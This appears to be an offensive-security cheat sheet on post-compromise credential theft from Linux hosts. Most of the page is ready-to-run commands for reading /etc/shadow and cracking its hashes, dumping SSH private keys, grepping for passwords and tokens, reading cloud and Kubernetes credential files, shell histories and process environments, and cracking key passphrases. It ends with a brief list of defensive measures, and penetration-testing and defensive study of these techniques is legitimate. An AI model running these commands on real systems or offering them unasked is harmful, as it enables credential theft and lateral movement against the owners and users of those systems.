Skip to content

Linux Credential Theft

After compromising a Linux host, harvesting credentials is what lets you escalate, move to other systems, and persist. Linux stores secrets in many places: password hashes, SSH keys, application tokens, cloud credentials, command histories, and configurations. A host rarely lives in isolation: the credentials you find here usually open the next system.

# if you're root (or have cap_dac_read_search / equivalent)
cat /etc/shadow # user password hashes
cat /etc/passwd # users (combine with shadow -> unshadow -> crack)
unshadow /etc/passwd /etc/shadow > hashes.txt
hashcat -m 1800 hashes.txt rockyou.txt # $6$ = sha512crypt
john hashes.txt --wordlist=rockyou.txt

Formats: $1$ MD5crypt, $5$ sha256, $6$ sha512, $y$/$2$ yescrypt/bcrypt. Crackable offline depending on strength.

# the user's private keys -> access to other hosts
cat ~/.ssh/id_rsa ~/.ssh/id_ed25519 2>/dev/null
cat ~/.ssh/config # which hosts it connects to and how
cat ~/.ssh/known_hosts # known hosts (targets)
cat ~/.ssh/authorized_keys # who can log in (persistence)
# search for keys across the system
find / -name "id_rsa*" -o -name "*.pem" 2>/dev/null

An SSH private key without a passphrase is direct access to every host it’s authorized on.

# mass search
grep -rniE 'password|passwd|secret|api[_-]?key|token' /etc /opt /var/www /home 2>/dev/null
# typical locations
/var/www/**/wp-config.php, config.php, .env # webapps (DB creds)
~/.aws/credentials, ~/.config/gcloud, ~/.kube/config # cloud/k8s
~/.netrc, ~/.git-credentials, ~/.pgpass, ~/.my.cnf # services
/etc/fstab # mount credentials (CIFS)
docker: environment variables, docker inspect
cat ~/.bash_history ~/.zsh_history # prior commands (sometimes cleartext passwords!)
history
# credentials in process memory (with privileges)
strings /proc/<pid>/environ # a process's environment variables
# MySQL/psql/redis history
cat ~/.mysql_history ~/.psql_history ~/.rediscli_history

The .bash_history is a classic: mysql -u root -pSuperSecret123 gets logged.

# databases
/etc/mysql/, postgres config, mongod.conf
# password managers / keyrings (if there's a session)
~/.config/keepassxc, gnome-keyring, ~/.password-store (pass)
# app and CI/CD tokens
app .env, Jenkins/GitLab runners, pipeline variables
linpeas.sh # flags found credentials automatically
LinEnum.sh
# cracking
hashcat / john # /etc/shadow, app hashes
# SSH keys with passphrase
ssh2john id_rsa > hash ; john hash
  • No cleartext credentials: use secret managers (Vault, k8s secrets), 600 permissions, never in .bash_history (HISTIGNORE, use a file/prompt).
  • SSH keys with a passphrase and rotation; audited authorized_keys; ssh-agent with expiry.
  • Strong hashes (sha512/yescrypt) and robust passwords (slows offline cracking).
  • Least privilege: a compromised user shouldn’t read /etc/shadow or other services’ secrets.
  • Monitor access to sensitive files (auditd) and credential reuse across hosts.
  • /etc/shadow + /etc/passwd → unshadow → crack
  • SSH private keys and config/known_hosts (lateral)
  • Mass grep for credentials in /etc, /var/www, /home, /opt
  • Cloud/k8s credentials (.aws, .kube, gcloud)
  • Histories (.bash_history, .mysql_history)
  • Process environment variables (/proc/pid/environ)
  • App/DB configs with credentials
  • Reuse what’s found toward other hosts/users